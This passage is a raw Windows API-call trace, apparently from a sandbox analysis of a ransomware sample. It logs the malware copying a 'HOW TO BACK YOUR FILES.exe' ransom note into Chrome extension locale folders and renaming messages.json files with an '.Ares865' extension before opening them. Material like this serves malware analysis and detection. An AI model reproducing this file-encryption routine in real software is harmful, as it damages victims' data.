cAlternateFileName="")) returned 0x2ccde8 [0103.208] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.208] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.208] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW" [0103.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW" [0103.209] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.209] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.209] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.210] GetLastError () returned 0x0 [0103.210] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.210] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eead060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eead060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.210] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.210] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.210] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.Ares865") returned 163 [0103.210] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.212] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206) returned 1 [0103.217] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN" [0103.217] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN" [0103.217] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.217] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.218] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.218] GetLastError () returned 0x0 [0103.218] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.218] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eead060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eead060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.218] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.218] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.218] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.Ares865") returned 163 [0103.218] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.221] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206) returned 1 [0103.224] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi" [0103.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi" [0103.224] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.224] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.224] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.225] GetLastError () returned 0x0 [0103.225] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.225] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eead060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eead060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.225] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.225] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.225] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.Ares865") returned 160 [0103.225] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.227] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.227] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=225) returned 1 [0103.230] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk" [0103.230] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk" [0103.230] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.230] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.231] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.231] GetLastError () returned 0x0 [0103.232] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.232] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eead060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eead060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.232] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.232] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.232] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.Ares865") returned 160 [0103.232] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.234] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0103.237] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr" [0103.237] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr" [0103.237] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.237] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.238] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.238] GetLastError () returned 0x0 [0103.238] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.238] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eed31c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eed31c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.238] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.238] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.239] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.Ares865") returned 160 [0103.239] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.240] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.240] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=227) returned 1 [0103.243] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th" [0103.243] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th" 